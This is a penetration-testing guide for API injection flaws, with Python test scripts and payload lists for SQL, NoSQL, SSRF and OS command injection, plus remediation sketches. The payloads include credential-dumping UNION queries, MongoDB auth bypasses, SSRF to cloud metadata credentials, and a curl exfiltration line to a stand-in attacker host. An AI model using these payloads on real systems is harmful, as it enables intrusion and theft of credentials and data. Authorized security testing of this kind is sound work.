Exploiting API Injection Vulnerabilities
When to Use
- Testing API endpoints that accept user input for database queries, system commands, or external requests
- Assessing APIs that interact with SQL databases, NoSQL stores (MongoDB, Redis), LDAP directories, or external URLs
- Evaluating input validation and parameterized query usage across all API endpoints
- Testing for SSRF where API parameters accept URLs or hostnames that trigger server-side requests
- Identifying injection points in headers, path parameters, query strings, and JSON/XML request bodies
Do not use without written authorization. Injection testing can modify or destroy data and compromise backend systems.
Prerequisites
- Written authorization specifying target API and backend systems in scope
- Python 3.10+ with the `requests` library
- SQLMap for automated SQL injection detection and exploitation
- Burp Suite Professional with Active Scan capabilities
- Knowledge of the backend database technology (MySQL, PostgreSQL, MongoDB, Redis)
- Isolated test environment to avoid production data corruption
Workflow
Step 1: Injection Point Identification
import requests
import json
import urllib.parse
BASE_URL = "https://target-api.example.com/api/v1"
headers = {"Authorization": "Bearer <token>", "Content-Type": "application/json"}
# Map all input points across the API
injection_points = [
# Path parameters
{"type": "path", "method": "GET", "url": "/users/{input}"},
{"type": "path", "method": "GET", "url": "/products/{input}"},
{"type": "path", "method": "GET", "url": "/orders/{input}"},
# Query parameters
{"type": "query", "method": "GET", "url": "/users?search={input}"},
{"type": "query", "method": "GET", "url": "/products?sort={input}&order={input}"},
{"type": "query", "method": "GET", "url": "/products?category={input}"},
{"type": "query", "method": "GET", "url": "/search?q={input}"},
# JSON body parameters
{"type": "body", "method": "POST", "url": "/auth/login", "fields": ["username", "password"]},
{"type": "body", "method": "POST", "url": "/users", "fields": ["name", "email"]},
{"type": "body", "method": "POST", "url": "/search", "fields": ["query", "filters"]},
{"type": "body", "method": "POST", "url": "/webhook", "fields": ["url", "callback_url"]},
# Header parameters
{"type": "header", "method": "GET", "url": "/users/me", "headers": ["X-Forwarded-For", "Referer", "User-Agent"]},
]
Step 2: SQL Injection Testing
# SQL injection payloads for different contexts
SQL_PAYLOADS = {
"detection": [
"'",
"\"",
"' OR '1'='1",
"\" OR \"1\"=\"1",
"1 OR 1=1",
"' OR 1=1--",
"' UNION SELECT NULL--",
"1; WAITFOR DELAY '0:0:5'--",
"1' AND SLEEP(5)--",
"1)) OR 1=1--",
],
"union_based": [
"' UNION SELECT NULL,NULL,NULL--",
"' UNION SELECT 1,2,3--",
"' UNION SELECT username,password,NULL FROM users--",
"-1 UNION SELECT table_name,NULL,NULL FROM information_schema.tables--",
],
"error_based": [
"' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))--",
"' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
],
"time_based": [
"' AND SLEEP(5)--",
"'; WAITFOR DELAY '0:0:5'--",
"' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
"1; SELECT pg_sleep(5)--",
],
}
import time
def test_sql_injection(endpoint, param_name, param_type="query"):
    """Test a parameter for SQL injection."""

    def send(value):
        """Send one request with `value` placed in the chosen parameter."""
        if param_type == "query":
            return requests.get(f"{BASE_URL}{endpoint}", headers=headers,
                                params={param_name: value}, timeout=15)
        if param_type == "body":
            return requests.post(f"{BASE_URL}{endpoint}", headers=headers,
                                 json={param_name: value}, timeout=15)
        if param_type == "path":
            path = endpoint.replace("{input}", urllib.parse.quote(value))
            return requests.get(f"{BASE_URL}{path}", headers=headers, timeout=15)
        raise ValueError(f"unsupported param_type: {param_type}")

    results = []
    # Fetch the benign baseline once, through the same channel as the payloads
    baseline_text = send("test").text
    for category, payloads in SQL_PAYLOADS.items():
        for payload in payloads:
            start = time.time()
            try:
                resp = send(payload)
            except requests.exceptions.RequestException as exc:
                print(f"[!] {endpoint} ({param_name}): request failed - {exc}")
                continue
            elapsed = time.time() - start
            # Check for SQL injection indicators
            body = resp.text.lower()
            # Delay payloads use SLEEP/pg_sleep (MySQL, PostgreSQL) or WAITFOR (SQL Server)
            delay_payload = any(kw in payload.upper() for kw in ("SLEEP", "WAITFOR"))
            indicators = {
                "error": any(kw in body for kw in [
                    "sql syntax", "mysql", "postgresql", "sqlite",
                    "oracle", "unterminated", "syntax error",
                    "unexpected end", "quoted string", "invalid input"
                ]),
                "time_based": elapsed > 4.5 and delay_payload,
                # A 200 response that differs from the baseline is only a lead; confirm manually
                "union_data": resp.status_code == 200 and len(resp.text) > 0
                              and "UNION" in payload.upper()
                              and resp.text != baseline_text,
            }
            if any(indicators.values()):
                triggered = [k for k, v in indicators.items() if v]
                results.append({
                    "endpoint": endpoint,
                    "param": param_name,
                    "category": category,
                    "payload": payload,
                    "indicators": triggered,
                    "status": resp.status_code,
                    "time": f"{elapsed:.1f}s"
                })
                print(f"[SQLi] {endpoint} ({param_name}): {category} - {triggered}")
    return results
# Test search parameter
test_sql_injection("/search", "q", "query")
test_sql_injection("/products", "category", "query")
test_sql_injection("/auth/login", "username", "body")
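The time-based check above uses a fixed cutoff, which can misfire on endpoints that are already slow. A minimal sketch of a baseline-relative comparison follows; the function name `is_significant_delay` and the `tolerance` parameter are illustrative assumptions, not part of the original workflow.

```python
import statistics


def is_significant_delay(baseline_times, observed, injected_delay=5.0, tolerance=0.5):
    """Return True when `observed` exceeds the typical baseline latency by
    roughly the injected delay, instead of merely crossing a fixed cutoff.

    baseline_times: latencies (seconds) of benign requests to the same endpoint.
    observed: latency (seconds) of the request carrying the delay payload.
    """
    if not baseline_times:
        raise ValueError("at least one baseline sample is required")
    typical = statistics.median(baseline_times)
    return observed - typical >= injected_delay - tolerance


# An endpoint that normally takes about 4.8 s is not flagged at 5.0 s,
# while a normally fast endpoint that takes 5.3 s is.
print(is_significant_delay([4.7, 4.8, 4.9], observed=5.0))
print(is_significant_delay([0.2, 0.3, 0.25], observed=5.3))
```

Repeating the delayed request a few times before reporting helps rule out one-off network jitter.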
Step 3: NoSQL Injection Testing
# NoSQL injection payloads (MongoDB-focused)
NOSQL_PAYLOADS = {
"auth_bypass": [
# MongoDB operator injection in JSON body
{"username": {"$ne": ""}, "password": {"$ne": ""}},
{"username": {"$gt": ""}, "password": {"$gt": ""}},
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}},
{"username": "admin", "password": {"$ne": "wrongpassword"}},
{"username": {"$in": ["admin", "root", "administrator"]}, "password": {"$ne": ""}},
],
"data_extraction": [
{"username": {"$regex": "^a"}, "password": {"$ne": ""}}, # Enumerate first char
{"username": {"$where": "this.username.length > 0"}, "password": {"$ne": ""}},
],
"operator_injection_string": [
# When input is a string field
'{"$gt": ""}',
'{"$ne": null}',
'{"$regex": ".*"}',
'{"$where": "1==1"}',
],
}
def test_nosql_injection(endpoint, method="POST"):
    """Test for MongoDB NoSQL injection."""
    results = []
    # Test JSON body operator injection
    for category, payloads in NOSQL_PAYLOADS.items():
        for payload in payloads:
            if isinstance(payload, dict):
                body = payload
            else:
                # String payloads are parsed into an operator object for the username field
                body = {"username": json.loads(payload), "password": "test"}
            resp = requests.request(method, f"{BASE_URL}{endpoint}",
                                    headers=headers, json=body, timeout=10)
            if resp.status_code != 200:
                continue
            try:
                resp_data = resp.json()
            except ValueError:
                # Non-JSON 200 response: nothing to inspect
                resp_data = {}
            # Heuristic only: a token or user object in a 200 response suggests a bypass; verify manually
            if "token" in str(resp_data) or "user" in str(resp_data):
                results.append({
                    "endpoint": endpoint,
                    "category": category,
                    "payload": str(payload)[:100],
                    "authenticated": True,
                    "response": str(resp_data)[:200]
                })
                print(f"[NoSQLi] {endpoint}: {category} - Auth bypass successful")
    return results
nosql_results = test_nosql_injection("/auth/login")
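When retesting after a fix, it helps to know what the server-side counterpart to these operator payloads looks like. The following is a minimal sketch of type and operator checks a login handler might apply before building a MongoDB query. The helper names `contains_operator` and `validate_login_body` are hypothetical, and the target API's actual validation may differ.

```python
def contains_operator(value):
    """Recursively report whether any dict key starts with '$' (a MongoDB operator)."""
    if isinstance(value, dict):
        return any(
            (isinstance(key, str) and key.startswith("$")) or contains_operator(item)
            for key, item in value.items()
        )
    if isinstance(value, list):
        return any(contains_operator(item) for item in value)
    return False


def validate_login_body(body):
    """Accept only plain, non-empty string credentials; raise ValueError otherwise."""
    if not isinstance(body, dict):
        raise ValueError("request body must be a JSON object")
    for field in ("username", "password"):
        candidate = body.get(field)
        if not isinstance(candidate, str) or not candidate:
            raise ValueError(f"{field} must be a non-empty string")
    return {"username": body["username"], "password": body["password"]}


# The operator payload from the auth_bypass list is rejected before any query is built.
try:
    validate_login_body({"username": {"$ne": ""}, "password": {"$ne": ""}})
except ValueError as exc:
    print(f"rejected: {exc}")
```

Requiring string types closes the operator-injection path for credential fields. `contains_operator` is meant for free-form fields such as `filters`, where nested objects are legitimate.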
Step 4: Server-Side Request Forgery (SSRF) Testing
# SSRF payloads targeting internal services
SSRF_PAYLOADS = {
"cloud_metadata": [
"http://169.254.169.254/latest/meta-data/", # AWS IMDS
"http://169.254.169.254/latest/meta-data/iam/security-credentials/", # AWS IAM creds
"http://metadata.google.internal/computeMetadata/v1/", # GCP
"http://169.254.169.254/metadata/instance?api-version=2021-02-01", # Azure
],
"internal_services": [
"http://localhost:8080/",
"http://127.0.0.1:6379/", # Redis
"http://127.0.0.1:9200/", # Elasticsearch
"http://127.0.0.1:27017/", # MongoDB
"http://internal-api.local:8080/",
"http://10.0.0.1/admin/",
],
"protocol_smuggling": [
"gopher://127.0.0.1:6379/_SET%20pwned%20true",
"file:///etc/passwd",
"dict://127.0.0.1:6379/INFO",
],
"bypass_filters": [
"http://0x7f000001/", # Hex IP for 127.0.0.1
"http://2130706433/", # Decimal IP for 127.0.0.1
"http://0177.0.0.1/", # Octal
"http://127.0.0.1.nip.io/", # Wildcard DNS name that resolves to 127.0.0.1 (not DNS rebinding)
"http://[::1]/", # IPv6 localhost
"http://127.1/", # Shortened IP
"http://0/", # Zero
],
}
def test_ssrf(endpoint, url_param, method="POST"):
    """Test for SSRF in URL-accepting parameters."""
    results = []
    for category, payloads in SSRF_PAYLOADS.items():
        for payload in payloads:
            try:
                if method == "POST":
                    resp = requests.post(f"{BASE_URL}{endpoint}",
                                         headers=headers,
                                         json={url_param: payload}, timeout=10)
                else:
                    resp = requests.get(f"{BASE_URL}{endpoint}",
                                        headers=headers,
                                        params={url_param: payload}, timeout=10)
            except requests.exceptions.RequestException as exc:
                print(f"[!] {endpoint}: {payload} - request failed: {exc}")
                continue
            # Check for SSRF indicators
            if resp.status_code == 200 and len(resp.text) > 50:
                # Check for cloud metadata or local file content in the response
                if any(kw in resp.text for kw in ["ami-id", "instance-id",
                                                  "security-credentials", "AccessKeyId",
                                                  "root:x:", "computeMetadata"]):
                    results.append({
                        "endpoint": endpoint,
                        "category": category,
                        "payload": payload,
                        "severity": "critical",
                        "data": resp.text[:300]
                    })
                    print(f"[SSRF-CRITICAL] {endpoint}: {category} - {payload}")
                else:
                    # A long 200 response alone does not prove SSRF; compare with a benign URL
                    results.append({
                        "endpoint": endpoint,
                        "category": category,
                        "payload": payload,
                        "severity": "unconfirmed",
                        "data": resp.text[:100]
                    })
                    print(f"[SSRF?] {endpoint}: {category} - {payload} -> {resp.status_code}")
    return results
# Test endpoints that accept URLs
ssrf_results = test_ssrf("/webhook/test", "url")
ssrf_results.extend(test_ssrf("/import", "source_url"))
ssrf_results.extend(test_ssrf("/proxy", "target", "GET"))
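For reference when interpreting results, a strict allowlist on the server should reject every payload category above, including the alternate IP encodings. The sketch below shows one way such a check might look. The host `hooks.partner.example.com` and the function name `is_allowed_webhook_url` are assumptions for illustration only.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist; a real deployment would load this from configuration.
ALLOWED_WEBHOOK_HOSTS = {"hooks.partner.example.com"}


def is_allowed_webhook_url(url, allowed_hosts=ALLOWED_WEBHOOK_HOSTS):
    """Allow only https URLs on the default port whose exact hostname is allowlisted."""
    try:
        parts = urlsplit(url)
        host = parts.hostname
        port = parts.port
    except ValueError:
        # Malformed host or port
        return False
    if parts.scheme != "https" or host is None:
        return False
    if parts.username or parts.password:
        # Reject userinfo tricks such as https://trusted@evil.example/
        return False
    if port not in (None, 443):
        return False
    return host in allowed_hosts


for candidate in [
    "https://hooks.partner.example.com/orders",
    "http://169.254.169.254/latest/meta-data/",
    "http://0x7f000001/",
    "gopher://127.0.0.1:6379/_SET%20pwned%20true",
]:
    print(candidate, "->", is_allowed_webhook_url(candidate))
```

An exact-match allowlist avoids parsing numeric IP variants at all. It does not cover redirects or later DNS changes, so the HTTP client that fetches the URL would also need redirects disabled and egress filtering in place.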
Step 5: OS Command Injection Testing
# Command injection payloads
CMD_PAYLOADS = {
"detection": [
"; sleep 5",
"| sleep 5",
"` sleep 5 `",
"$( sleep 5 )",
"\n sleep 5",
"& ping -c 5 127.0.0.1 &",
],
"data_exfil": [
"; cat /etc/passwd",
"| id",
"`whoami`",
"$(uname -a)",
"; curl http://attacker-controlled-server.com/$(whoami)",
],
"windows": [
"& ping -n 5 127.0.0.1 &",
"| dir",
"; type C:\\Windows\\System32\\drivers\\etc\\hosts",
"& timeout /t 5 &",
],
}
def test_command_injection(endpoint, param_name, param_type="body"):
    """Test for OS command injection."""
    results = []
    for category, payloads in CMD_PAYLOADS.items():
        for payload in payloads:
            prefixed_payload = f"validvalue{payload}"
            start = time.time()
            try:
                if param_type == "body":
                    resp = requests.post(f"{BASE_URL}{endpoint}",
                                         headers=headers,
                                         json={param_name: prefixed_payload}, timeout=15)
                else:
                    resp = requests.get(f"{BASE_URL}{endpoint}",
                                        headers=headers,
                                        params={param_name: prefixed_payload}, timeout=15)
            except requests.exceptions.RequestException as exc:
                print(f"[!] {endpoint} ({param_name}): request failed - {exc}")
                continue
            elapsed = time.time() - start
            # Delay-style payloads: "sleep 5" on Unix shells, "timeout /t 5" on Windows
            delay_payload = any(kw in payload.lower() for kw in ("sleep", "timeout /t"))
            indicators = {
                "time_based": elapsed > 4.5 and delay_payload,
                # Generic words such as "Linux" or "Windows" also occur in normal responses; review hits manually
                "output": any(kw in resp.text for kw in [
                    "root:", "uid=", "Linux", "Windows", "bin/bash",
                    "Directory of", "Volume Serial"
                ]),
            }
            if any(indicators.values()):
                results.append({
                    "endpoint": endpoint,
                    "param": param_name,
                    "category": category,
                    "payload": payload,
                    "indicators": [k for k, v in indicators.items() if v],
                })
                print(f"[CMDi] {endpoint} ({param_name}): {payload}")
    return results
# Test file processing and system interaction endpoints
test_command_injection("/export", "filename")
test_command_injection("/convert", "input_file")
test_command_injection("/ping", "host", "query")
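These payloads only work when the backend passes the parameter through a shell. As a point of comparison for remediation advice, here is a minimal sketch of the shell-free pattern: the value is validated against a strict filename pattern and handed to the child process as a single argument. The helper names `is_safe_filename` and `echo_argument` are hypothetical, and the child process is just the Python interpreter echoing its argument so the example runs anywhere.

```python
import re
import subprocess
import sys

# Letters, digits, underscore, hyphen, plus one optional extension; no separators or spaces.
SAFE_FILENAME = re.compile(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)?")


def is_safe_filename(name):
    """Return True only for names that fully match the strict pattern above."""
    return SAFE_FILENAME.fullmatch(name) is not None


def echo_argument(value):
    """Pass `value` to a child process as one argv element, with no shell involved."""
    completed = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", value],
        capture_output=True, text=True, check=True, timeout=10,
    )
    return completed.stdout.rstrip("\n")


payload = "validvalue; sleep 5"
print(is_safe_filename(payload))      # the validator rejects the payload
print(repr(echo_argument(payload)))   # without a shell, the metacharacters stay literal
```

Because no shell parses the argument list, `;`, `|`, backticks, and `$( )` carry no special meaning. The validation step is still worthwhile, since the called program may interpret its arguments in its own way.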
Key Concepts
| Term | Definition |
|---|---|
| SQL Injection | Inserting SQL code into API parameters that are concatenated into database queries, enabling data extraction or modification |
| NoSQL Injection | Injecting NoSQL operators ($ne, $gt, $regex) into MongoDB queries or manipulating Redis/Elasticsearch queries through API parameters |
| SSRF | Server-Side Request Forgery (OWASP API7:2023) - forcing the server to make HTTP requests to attacker-specified destinations including internal services |
| Command Injection | Injecting OS commands through API parameters that are passed to shell execution functions (exec, system, popen) |
| Parameterized Queries | Using prepared statements with bound parameters to prevent SQL injection by separating code from data |
| Input Validation | Server-side verification that user input conforms to expected format, type, length, and character set before processing |
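The difference between concatenated and parameterized queries can be illustrated with a short, self-contained sketch. It uses Python's built-in `sqlite3` module and an in-memory table purely for demonstration. The table layout and function names are assumptions, and a real backend would apply the same placeholder technique through its own database driver.

```python
import sqlite3


def build_demo_db():
    """Create an in-memory database with two sample products."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, category TEXT)")
    conn.executemany(
        "INSERT INTO products (name, category) VALUES (?, ?)",
        [("laptop", "electronics"), ("novel", "books")],
    )
    return conn


def search_concatenated(conn, category):
    # Vulnerable: user input becomes part of the SQL text itself.
    query = f"SELECT name FROM products WHERE category = '{category}'"
    return [row[0] for row in conn.execute(query)]


def search_parameterized(conn, category):
    # Safe: the driver binds the value, so it is never parsed as SQL.
    query = "SELECT name FROM products WHERE category = ?"
    return [row[0] for row in conn.execute(query, (category,))]


conn = build_demo_db()
payload = "' OR '1'='1"
print(sorted(search_concatenated(conn, payload)))  # every row matches
print(search_parameterized(conn, payload))         # no category has this literal value
```

With the bound parameter, the detection payload is compared as an ordinary string and matches nothing, which is the behavior a retest should observe once an endpoint has been fixed.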
Tools & Systems
- SQLMap: Automated SQL injection detection and exploitation tool supporting all major database types
- Burp Suite Professional: Active scanner with injection detection for SQL, NoSQL, SSRF, and command injection
- NoSQLMap: Automated NoSQL injection detection and exploitation tool focused on MongoDB
- SSRFmap: SSRF detection and exploitation framework with cloud metadata extraction modules
- Commix: Automated OS command injection detection and exploitation tool
Common Scenarios
Scenario: E-Commerce API Injection Assessment
Context: An e-commerce API uses PostgreSQL for the product catalog, MongoDB for user sessions, and accepts webhook URLs for order notifications. The API is built with Node.js/Express.
Approach:
- Test product search endpoint `GET /api/v1/products?search=test` with SQL payloads - discover error-based SQLi revealing PostgreSQL 14 backend
- Exploit union-based SQLi to extract all table names, then dump user credentials from the `users` table
- Test login endpoint with NoSQL operators - `{"username":{"$ne":""},"password":{"$ne":""}}` bypasses authentication
- Test webhook URL endpoint for SSRF - `POST /api/v1/webhooks {"url":"http://169.254.169.254/latest/meta-data/"}` returns AWS instance metadata
- Extract AWS IAM role credentials via SSRF, gaining access to S3 buckets containing customer data
- Test file export endpoint for command injection - `GET /api/v1/export?filename=report;cat /etc/passwd` returns passwd file contents
Pitfalls:
- Only testing SQL injection when the backend uses multiple data stores (SQL, NoSQL, Redis, Elasticsearch)
- Missing injection points in HTTP headers (User-Agent, Referer, X-Forwarded-For) that may be logged to SQL databases
- Not testing SSRF bypass techniques when the initial payload is blocked by URL validation
- Assuming JSON API bodies are safe from SQL injection (JSON values are still concatenated into queries)
- Not testing time-based injection when error messages are suppressed
Output Format
## Finding: SQL Injection in Product Search API Enables Full Database Access
**ID**: API-INJ-001
**Severity**: Critical (CVSS 9.8)
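**OWASP API**: API8:2019 - Injection (the 2023 list has no dedicated injection category; API8:2023 is Security Misconfiguration); API7:2023 - Server Side Request Forgery for the webhook endpoint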
**Affected Endpoints**:
- GET /api/v1/products?search= (SQL injection)
- POST /api/v1/auth/login (NoSQL injection)
- POST /api/v1/webhooks (SSRF)
**Description**:
The product search API concatenates user input directly into a PostgreSQL
query without parameterization. An attacker can extract all database
contents including user credentials, payment information, and admin
secrets. Additionally, the login endpoint is vulnerable to MongoDB
NoSQL operator injection, and the webhook endpoint allows SSRF to
internal services and cloud metadata.
**Impact**:
- Full database read/write access via SQL injection
- Authentication bypass via NoSQL operator injection
- AWS IAM credential theft via SSRF to instance metadata
- Potential remote code execution via SQL injection stacked queries
**Remediation**:
1. Use parameterized queries for all database operations
2. Enforce expected types on JSON input and reject objects or keys beginning with `$` in fields passed to MongoDB queries
3. Implement URL allowlisting for webhook and callback URLs
4. Block access to cloud metadata endpoints (169.254.169.254) from application servers
5. Use an ORM with parameterized queries and disable raw query methods
6. Implement WAF rules for common injection patterns as defense in depth